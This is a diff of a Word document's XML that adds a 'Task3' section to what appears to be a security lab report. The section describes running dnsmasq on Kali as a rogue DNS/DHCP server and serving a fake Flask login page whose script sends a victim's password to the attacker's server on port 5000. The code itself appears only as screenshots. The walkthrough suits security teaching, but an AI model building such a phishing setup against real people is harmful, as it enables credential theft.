+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Task3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We first install </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>ifconfig</w:t>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>dnsmasq</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>` to check whether the internet card connect to the internet</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Task2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in the kali, and configure the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>conf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file according below </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72ED6438" wp14:editId="387855E2">
+            <wp:extent cx="6065703" cy="6837218"/>
+            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
+            <wp:docPr id="8" name="Picture 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6072294" cy="6844648"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">And execute the shell script to launch the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>dnsmsaq</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>dns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> server and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>dhcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> server)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>```</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  setting.sh</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>```</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575D2549" wp14:editId="511721FF">
+            <wp:extent cx="6354814" cy="6546273"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="12" name="Picture 12"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6382767" cy="6575068"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>nd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> then we create the fake login page</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and turn on the flask server </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">on </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>we assume this is similar as the real page which victim using)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5943600" cy="5061585"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="15" name="Picture 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="15" name="Untitled.jpg"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="5061585"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">when victim </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">enter the password and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">click the submit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the chrome will execute the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>js</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> script sending the password to the flask server we build in the kali trough port 5000</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>api</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> will automatic generate the file for password captured.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
@@ -791,6 +2597,103 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1C4F465C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="8B50EB78"/>
+    <w:lvl w:ilvl="0" w:tplc="0C09000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C09001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C09000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C09001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C09000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C09001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -1187,6 +3090,25 @@
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading3">
+    <w:name w:val="heading 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="Heading3Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="002A4645"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="27"/>
+      <w:szCs w:val="27"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -1213,6 +3135,31 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
+  </w:style>
